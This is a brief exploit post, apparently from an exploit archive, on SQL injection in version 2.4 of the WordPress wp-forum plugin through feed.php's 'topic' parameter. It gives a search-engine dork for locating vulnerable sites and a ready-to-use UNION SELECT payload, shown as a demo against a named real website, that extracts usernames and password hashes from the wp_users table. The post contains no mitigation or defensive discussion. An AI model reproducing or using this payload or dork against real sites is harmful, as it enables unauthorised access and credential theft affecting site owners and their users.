############## # Exploit Title : Wordpress wp-forum plugin SQL Injection # # Exploit Author : Ashiyane Digital Security Team # # software Link : www.fahlstad.se/wordpress/plugins/wp-forum/ # # Home : ww.Ashiyane.org # # Version : 2.4 # # Security Risk : High - SQL Injection # # Dork : inurl:wp-content/plugins/wp-forum/feed.php?topic= # ############## #Location : site/wp-content/plugins/wp-forum/feed.php?topic=[SQL] # # # #DEm0: # www.harmonies-online.fr/wp-content/plugins/wp-forum/feed.php?topic=-4381+union+select+group_concat%28user_login,0x3a,user_pass%29+from+wp_users%23 # # ############## #Greetz to: My Lord ALLAH ############## # # Amirh03in # ##############